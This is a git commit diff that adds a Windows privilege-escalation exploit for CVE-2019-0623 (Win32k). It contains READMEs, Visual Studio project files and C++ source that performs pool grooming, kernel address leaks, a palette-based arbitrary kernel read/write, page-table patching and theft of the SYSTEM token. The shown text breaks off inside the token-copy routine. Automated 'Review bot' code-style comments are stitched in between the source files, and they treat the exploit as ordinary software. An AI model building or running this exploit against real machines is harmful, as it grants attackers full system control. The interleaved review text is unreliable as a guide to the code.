add several 2019 cve

helloexp 2022-03-01 16:58:42 +08:00
parent e91fbcdf96
commit 24160bc81c
56 changed files with 4712 additions and 0 deletions

Binary file not shown.


@ -0,0 +1,52 @@
### CVE-2019-0623
#### 描述
Win32k特权提升漏洞
#### 影响版本
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1703 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | ✔ |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1803 | | |
| Windows Server | | 1709 | | |
#### 修复补丁
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623
```
#### 利用方式
编译环境
- VS2019V142X86 Debug
改POC只对x86的机器有效测试机器为Windows 7 SP1 x86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif)
#### 分析文章
- https://paper.seebug.org/832/
#### 代码来源
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0623-32-exp)


@ -0,0 +1,53 @@
### CVE-2019-0623
#### Describe
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
#### ImpactVersion
| Product | CPU Architecture | Version | Update | Tested |
| ------------------- | ---------------- | ------- | ------ | ------------------ |
| Windows 10 | x64/x86/ARM64 | 1803 | | |
| Windows 10 | x64/x86/ARM64 | 1709 | | |
| Windows 10 | x64/x86 | 1703 | | |
| Windows 10 | x64/x86 | 1607 | | |
| Windows 10 | x64/x86 | | | |
| Windows 8.1 | x64/x86 | | | |
| Windows RT 8.1 | | | | |
| Windows 7 | x64/x86 | | SP1 | ✔ |
| Windows Server 2016 | | | | |
| Windows Server 2012 | | R2 | | |
| Windows Server 2012 | | | | |
| Windows Server 2008 | x64/x86 | | SP2 | |
| Windows Server 2008 | x64 | R2 | SP1 | |
| Windows Server | | 1803 | | |
| Windows Server | | 1709 | | |
#### Patch
```
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0623
```
#### Utilization
CompilerEnvironment
- VS2019V142X86 Debug
POC is only valid for the X86 machine, the test machine is Windows 7 SP1 X86
![](https://raw.github.com/Ascotbe/Image/master/Kernelhub/CVE-2019-0623_win_7_sp1_x86.gif)
#### Analyze
- https://paper.seebug.org/832/
#### ProjectSource
- [DreamoneOnly](https://github.com/DreamoneOnly/CVE-2019-0623-32-exp)


@ -0,0 +1,33 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="main.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="FengShui.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="leak.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
</Project>


@ -0,0 +1,31 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30002.166
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2019-0623", "CVE-2019-0623.vcxproj", "{F8C67622-75D0-4FB8-8068-8367978E379E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x64.ActiveCfg = Debug|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x64.Build.0 = Debug|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x86.ActiveCfg = Debug|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Debug|x86.Build.0 = Debug|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x64.ActiveCfg = Release|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x64.Build.0 = Release|x64
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x86.ActiveCfg = Release|Win32
{F8C67622-75D0-4FB8-8068-8367978E379E}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {CC1E7F30-FEA3-45D6-9995-FD51E18B7BC2}
EndGlobalSection
EndGlobal


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,155 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>16.0</VCProjectVersion>
<ProjectGuid>{F8C67622-75D0-4FB8-8068-8367978E379E}</ProjectGuid>
<RootNamespace>My20188589</RootNamespace>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
<SpectreMitigation>false</SpectreMitigation>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v142</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="Shared">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<SDLCheck>true</SDLCheck>
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<ConformanceMode>true</ConformanceMode>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="FengShui.cpp" />
<ClCompile Include="leak.cpp" />
<ClCompile Include="main.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="leak.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>


@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>


@ -0,0 +1,95 @@
#include"leak.h"
#include<windows.h>
///////////////////////////////////////////////////////////////////////////////////////////////
//
// allocate session pool by CreatePalette
// pool size >= 0xa0
//
// pool_size = number * 4 + 0x58 + sizeof(_pool_header):{8}
// if (pool_size <= 0xa0)
// pool_size = 0xa0
//
// size must 8 bytes alignment on 32-bit windows
bool session_pool_fill_ge_0xa0(USHORT size, ULONG num, HPALETTE * p_hpalette)
{
bool ret = true;
USHORT tmp_NumEntries = 0x10;
PLOGPALETTE p_logPalette = nullptr;
if (size > 0xa0)
{
tmp_NumEntries += (size - 0xa0) / 4;
}
p_logPalette = static_cast<PLOGPALETTE>(malloc(sizeof(LOGPALETTE) + 4 * tmp_NumEntries));
if (p_logPalette == NULL)
{
ret = false;
goto end;
}
p_logPalette->palVersion = 0x300;
p_logPalette->palNumEntries = tmp_NumEntries;
for (size_t i = 0; i < num; i++)
{
p_hpalette[i] = CreatePalette(p_logPalette);
if (p_hpalette[i] == NULL)
{
ret = false;
break;
}
}
free(p_logPalette);
end:
return ret;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// allocate session pool by CreateAcceleratorTable
// pool size >= 0x20
//
// pool_size = number * 6 + 0x12 + sizeof(_pool_header):{8}
//
// size must 8 bytes alignment on 32-bit windows
bool session_pool_fill_ge_0x20(USHORT size, ULONG num, HACCEL* p_hAccel)
{
bool ret = true;
USHORT tmp_cAccel = NULL;
LPACCEL p_logAccel = nullptr;
if (size > 0x20)
{
tmp_cAccel += (size - 0x20) / 6;
}
p_logAccel = static_cast<LPACCEL>(malloc(sizeof(LOGPALETTE) * tmp_cAccel));
if (p_logAccel == NULL)
{
ret = false;
goto end;
}
for (size_t i = 0; i < num; i++)
{
p_hAccel[i] = CreateAcceleratorTable(p_logAccel, tmp_cAccel);
if (p_hAccel[i] == NULL)
{
ret = false;
break;
}
}
free(p_logAccel);
end:
return ret;
}
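Review bot: In session_pool_fill_ge_0x20 the buffer is allocated as `malloc(sizeof(LOGPALETTE) * tmp_cAccel)` although it is typed LPACCEL and handed to CreateAcceleratorTable, and `USHORT tmp_cAccel = NULL;` initialises an integer from the pointer macro; `USHORT tmp_cAccel = 0;` and `static_cast<LPACCEL>(calloc(tmp_cAccel, sizeof(ACCEL)))` would make the element type explicit and stop the call from reading uninitialised memory. Both fill functions also return false from the middle of the loop without telling the caller how many entries of p_hpalette/p_hAccel were created, and those handles are never released on that path. The header comments should state that contract, e.g. `// on failure, entries [0, i) hold valid handles that the caller must release`, since the callers in main.cpp only print "error" and continue.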


@ -0,0 +1,101 @@
#include"leak.h"
leak::leak()
{
GetXXXHmValidateHandle();
GetGdiSharedHandleTable();
Get_gSharedInfo_ulClientDelta();
}
void leak::GetXXXHmValidateHandle()
{
auto hModule = LoadLibrary(L"user32.dll");
auto func = GetProcAddress(hModule, "IsMenu");
for (size_t i = 0; i < 0x1000; i++)
{
BYTE* test = (BYTE*)func + i;
if (*test == 0xE8)
{
#ifdef _AMD64_
ULONG_PTR tmp = (ULONG_PTR)((ULONG_PTR) * (PULONG)(test + 1) | 0xffffffff00000000);
#else
ULONG_PTR tmp = (ULONG_PTR) * (PULONG)(test + 1);
#endif
HmValidateHandle = (_xxxHmValidateHandle)(test + tmp + 5);
break;
}
}
return;
}
void leak::GetGdiSharedHandleTable()
{
PULONG_PTR teb = (PULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x60);
GdiSharedHandleTable = (pGdiCell) * (PULONG_PTR*)((PBYTE)peb + 0xf8);
#else
PULONG_PTR peb = *(PULONG_PTR*)((PBYTE)teb + 0x30);
GdiSharedHandleTable = (pGdiCell) * (PULONG_PTR*)((PBYTE)peb + 0x94);
#endif
return;
}
void leak::Get_gSharedInfo_ulClientDelta()
{
auto pMenu = CreateMenu();
/* get g_DeltaDesktopHeap */
ULONG_PTR Teb = (ULONG_PTR)NtCurrentTeb();
#ifdef _AMD64_
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x800 + 0x28); //teb->Win32ClientInfo.ulClientDelta
#else
g_DeltaDesktopHeap = *(ULONG_PTR*)(Teb + 0x6CC + 0x1C);
#endif
auto hModule = GetModuleHandleW(L"user32.dll");
gSharedInfo = reinterpret_cast<PtagSharedInfo>(GetProcAddress(hModule, "gSharedInfo"));
DestroyMenu(pMenu);
}
PVOID leak::GetGdiKernelAddress(HANDLE hGdi)
{
return (GdiSharedHandleTable + LOWORD(hGdi))->pKernelAddress;
}
PVOID leak::GetUserObjectAddressBygSharedInfo(HANDLE hWnd, PULONG_PTR UserAddr)
{
PVOID ret = nullptr;
pHandleEntry tmp = nullptr;
for (ULONG_PTR i = 0; i < gSharedInfo->psi->cHandleEntries; i++)
{
tmp = gSharedInfo->aheList + i;
HANDLE handle = reinterpret_cast<HANDLE>(tmp->wUniq << 0x10 | i);
if (handle == hWnd)
{
ret = tmp->phead;
if (UserAddr != NULL)
{
*UserAddr = (ULONG_PTR)ret - g_DeltaDesktopHeap;
}
}
}
return ret;
}
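Review bot: None of the members these methods fill are initialised before use: GetXXXHmValidateHandle leaves HmValidateHandle unset when the 0x1000-byte scan finds no 0xE8 byte (or when LoadLibrary/GetProcAddress return NULL, which is not checked), and Get_gSharedInfo_ulClientDelta stores an unchecked GetProcAddress result that GetUserObjectAddressBygSharedInfo later dereferences through `gSharedInfo->psi`. A member-initialiser list on the constructor, `leak::leak() : HmValidateHandle(nullptr), g_DeltaDesktopHeap(0), GdiSharedHandleTable(nullptr), gSharedInfo(nullptr)`, plus a null check before each dereference, would turn these from wild reads into a clean failure. GetUserObjectAddressBygSharedInfo also keeps scanning after it has found the matching entry; a `break;` after the `*UserAddr` assignment makes the intent clear. The same uninitialised members are declared in leak.h in the next section.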


@ -0,0 +1,114 @@
#pragma once
#include<windows.h>
/*
Microsoft_Code_Name Windows_10_Version Microsoft_Marketing_Name Release_Date
Threshold 1 (TH1) 1507 ------ July 2015
Threshold 2 (TH2) 1511 ------ November 2015
Redstone 1 (RS1) 1607 Anniversary Update August 2016
Redstone 2 (RS2) 1703 Creators Update April 2017
Redstone 3 (RS3) 1709 Fall Creators Update October 2017
Redstone 4 (RS4) 1803 April 2018 Update April 2018
*/
typedef enum class _HANDLE_TYPE : ULONG_PTR
{
TYPE_FREE = 0,
TYPE_WINDOW = 1,
TYPE_MENU = 2,
TYPE_CURSOR = 3,
TYPE_SETWINDOWPOS = 4,
TYPE_HOOK = 5,
TYPE_CLIPDATA = 6,
TYPE_CALLPROC = 7,
TYPE_ACCELTABLE = 8,
TYPE_DDEACCESS = 9,
TYPE_DDECONV = 10,
TYPE_DDEXACT = 11,
TYPE_MONITOR = 12,
TYPE_KBDLAYOUT = 13,
TYPE_KBDFILE = 14,
TYPE_WINEVENTHOOK = 15,
TYPE_TIMER = 16,
TYPE_INPUTCONTEXT = 17,
TYPE_HIDDATA = 18,
TYPE_DEVICEINFO = 19,
TYPE_TOUCHINPUTINFO = 20,
TYPE_GESTUREINFOOBJ = 21,
TYPE_CTYPES,
TYPE_GENERIC = 255
} HANDLE_TYPE, * PHANDLE_TYPE;
typedef struct _GdiCell
{
PVOID pKernelAddress;
UINT16 wProcessIdl;
UINT16 wCount;
UINT16 wUpper;
UINT16 uType;
PVOID pUserAddress;
}GdiCell, * pGdiCell;
typedef struct _HandleEntry
{
PULONG_PTR phead;
PULONG_PTR pOwner;
BYTE bType;
BYTE bFlalgs;
USHORT wUniq;
}HandleEntry, * pHandleEntry;
typedef struct _tagServerInfo
{
ULONG dwSRVIFlags;
ULONG_PTR cHandleEntries;
//...
}tagServerInfo, * ptagServerInfo;
typedef struct _tagSharedInfo
{
ptagServerInfo psi;
pHandleEntry aheList;
//...
}tagSharedInfo, * PtagSharedInfo;
using _xxxHmValidateHandle = PVOID(__fastcall*)(HANDLE hwnd, ULONG_PTR handleType);
class leak
{
public:
leak();
~leak() {};
PVOID GetGdiKernelAddress(HANDLE hGdi); // RS1之前可用用于GDI Object
PVOID GetUserObjectAddressBygSharedInfo(HANDLE hWnd,PULONG_PTR UserAddr); // RS2之前可用用于User Obejct
_xxxHmValidateHandle HmValidateHandle; // RS4之前可用返回在用户层映射的地址用于User Object可以根据heap->pSelf找到内核地址
ULONG_PTR g_DeltaDesktopHeap;
private:
void GetGdiSharedHandleTable();
void Get_gSharedInfo_ulClientDelta();
void GetXXXHmValidateHandle();
public:
pGdiCell GdiSharedHandleTable;
PtagSharedInfo gSharedInfo;
};
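Review bot: The field names `wProcessIdl` in _GdiCell and `bFlalgs` in _HandleEntry look like typos for `wProcessId` and `bFlags`; nothing in this commit reads either field, so the rename is cosmetic, but it is cheaper now than after callers appear. The comments on the three public members on L572–L574 are in Chinese while the rest of the header is English; an English comment per member stating up to which Windows release each lookup is expected to work would keep the header self-describing next to the release table at its top. The constructor declared here does not initialise HmValidateHandle, g_DeltaDesktopHeap, GdiSharedHandleTable or gSharedInfo, so a reader should not assume a null value signals failure.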


@ -0,0 +1,447 @@
#include "leak.h"
#include <iostream>
using namespace std;
///////////////////////////////////////////////////////////////////////////////////////////////
//
// variables
//
leak p_leak;
HPALETTE g_hPalettle[0x1000];
ULONG_PTR g_KernelPalettle[0x1000];
ULONG_PTR g_hDC[0x3000];
HPALETTE hManage,hWorker;
ULONG_PTR Manage_index;
PVOID g_PsInitialSystemProcess;
constexpr auto number = 0x500;
HACCEL hAccel[number];
///////////////////////////////////////////////////////////////////////////////////////////////
//
// prototypes
//
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
typedef struct tagCLSMENUNAME
{
LPSTR pszClientAnsiMenuName;
LPWSTR pwszClientUnicodeMenuName;
PUNICODE_STRING pusMenuName;
} CLSMENUNAME, * PCLSMENUNAME;
typedef NTSTATUS(__stdcall* _ZwQuerySystemInformation)(
_In_ DWORD SystemInformationClass,
_Inout_ PVOID SystemInformation,
_In_ ULONG SystemInformationLength,
_Out_opt_ PULONG ReturnLength
);
typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
HANDLE Section;
PVOID MappedBase;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT LoadOrderIndex;
USHORT InitOrderIndex;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, * PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
bool session_pool_fill_ge_0xa0(USHORT size, ULONG num, HPALETTE* p_hpalette);
bool session_pool_fill_ge_0x20(USHORT size, ULONG num, HACCEL* p_hAccel);
///////////////////////////////////////////////////////////////////////////////////////////////
//
// Release tagCLS
//
__declspec(naked)
BOOL __stdcall NtUserUnregisterClass(
IN PUNICODE_STRING pstrClassName,
IN HINSTANCE hInstance,
OUT PCLSMENUNAME pcmn)
{
__asm
{
mov eax, 0x1263
mov edx, 0x7FFE0300
call dword ptr[edx]
retn 0x0C
}
}
BOOL ReleaseClass(
_In_ LPCWSTR lpClassName,
_In_opt_ HINSTANCE hInstance
)
{
UNICODE_STRING ClassName = { 0 };
CLSMENUNAME pcmn = { 0 };
ClassName.Buffer = (PWSTR)lpClassName;
ClassName.Length = (USHORT)wcslen(lpClassName);
ClassName.MaximumLength = ClassName.Length;
return NtUserUnregisterClass(&ClassName, hInstance, &pcmn);
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// 第一次占坑
//
__declspec(naked)
void __stdcall NtGdiSetLinkedUFIs(
IN HDC hdc,
IN char* pufiLinks,
IN ULONG uNumUFIs)
{
__asm
{
mov eax, 0x111D
mov edx, 0x7FFE0300
call dword ptr[edx]
retn 0x0C
}
}
void SparyDC()
{
char buf[0x200] = { 0 };
memset(buf, 0xCC, 0x200);
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
//__asm int 3
NtGdiSetLinkedUFIs((HDC)g_hDC[i], buf, 0x13); // a2 = (pool_size - 8) / 8
}
cout << "hdc address:0x" << hex << g_hDC << endl;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// modify hWorker's pointer
//
void modify_palPoniter()
{
char palette_Manage[0xa0] = { 0 };
*(PULONG_PTR)palette_Manage = (ULONG_PTR)hManage;
*(PULONG_PTR)(palette_Manage + 8) = 0x80000000;
*(PULONG_PTR)(palette_Manage + 0x10) = 0x00000501;
*(PULONG_PTR)(palette_Manage + 0x14) = 0x00000010;
*(PULONG_PTR)(palette_Manage + 0x4C) = g_KernelPalettle[0] + 0x4C;
hWorker = g_hPalettle[0];
for (ULONG_PTR i = 0; i < 0x1000; i++)
{
//__asm int 3
NtGdiSetLinkedUFIs((HDC)g_hDC[i], palette_Manage, 0xA);
}
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// get PsInitialSystemProcess
//
void get_PsInitialSystemProcess()
{
DWORD SysModuleSize;
PVOID NtKernelAddr;
PVOID NtKernelAddr_InUser;
PVOID PsInitialSystemProcess;
char* ImageName;
char NtKernelImageName[256] = { 0 };
PSYSTEM_MODULE_INFORMATION SysModule;
_ZwQuerySystemInformation ZwQuerySystemInformation;
ZwQuerySystemInformation = (_ZwQuerySystemInformation)GetProcAddress(GetModuleHandleA("ntdll.dll"), "ZwQuerySystemInformation");
ZwQuerySystemInformation(11, NULL, NULL, &SysModuleSize);
SysModule = (PSYSTEM_MODULE_INFORMATION)malloc(SysModuleSize);
ZwQuerySystemInformation(11, SysModule, SysModuleSize, &SysModuleSize);
NtKernelAddr = SysModule->Module[0].Base;
strcpy_s(NtKernelImageName, 256, SysModule->Module[0].ImageName);
ImageName = strrchr(NtKernelImageName, '\\') + 1;
NtKernelAddr_InUser = LoadLibraryA(ImageName);
PsInitialSystemProcess = GetProcAddress((HMODULE)NtKernelAddr_InUser, "PsInitialSystemProcess");
g_PsInitialSystemProcess = (PVOID)((DWORD)PsInitialSystemProcess - (DWORD)NtKernelAddr_InUser + (DWORD)NtKernelAddr);
cout << "PsInitialSystemProcess :0x" << hex << g_PsInitialSystemProcess << endl;
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// arbitrary read && wirute
//
void ar_read(ULONG_PTR addr,PULONG_PTR data)
{
SetPaletteEntries(hManage, 0, 1, (PALETTEENTRY*)&addr);
GetPaletteEntries(hWorker, 0, 1, (PALETTEENTRY*)data);
}
void ar_write(ULONG_PTR addr, PULONG_PTR data)
{
SetPaletteEntries(hManage, 0, 1, (PALETTEENTRY*)&addr);
SetPaletteEntries(hWorker, 0, 1, (PALETTEENTRY*)data);
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// fix dc
//
void fix_dc()
{
ULONG_PTR palette_hendleEntry = (ULONG_PTR)(p_leak.GdiSharedHandleTable + LOWORD(hManage));
ULONG_PTR pte_addr = 0xC0000000 + (palette_hendleEntry >> 12 << 3) ;
ULONG_PTR pte_data;
ar_read(pte_addr, &pte_data);
pte_data = pte_data | 0x2;
ar_write(pte_addr, &pte_data);
for (size_t i = 0; i < 4; i++)
{
*(PULONG_PTR)(palette_hendleEntry + i) = 0x0;
}
}
///////////////////////////////////////////////////////////////////////////////////////////////
//
// copy system token
//
constexpr auto ActiveProcessLinks = 0xb8;
constexpr auto Pid = 0xb4;
constexpr auto Token = 0xf8;
void copy_token()
{
ULONG_PTR system_eprocess;
ULONG_PTR current_pid = GetCurrentProcessId();
ULONG_PTR pid;
ULONG_PTR system_token;
ULONG_PTR nextProcess;
get_PsInitialSystemProcess();
ar_read((ULONG_PTR)g_PsInitialSystemProcess, &system_eprocess);
cout << "system_eprocess : 0x" << hex << system_eprocess << endl;
//__asm int 3
//find current process's eprocess
ar_read(system_eprocess + ActiveProcessLinks, &nextProcess);
nextProcess -= ActiveProcessLinks;
do
{
ar_read(nextProcess + Pid, &pid);
if (pid == current_pid)
{
break;
}
ar_read(nextProcess + ActiveProcessLinks, &nextProcess);
nextProcess -= ActiveProcessLinks;
} while (nextProcess != system_eprocess);
cout << "current_eprocess : 0x" << hex << nextProcess << endl;
//copy system token
ar_read(system_eprocess + Token, &system_token);
ar_write(nextProcess + Token, &system_token);
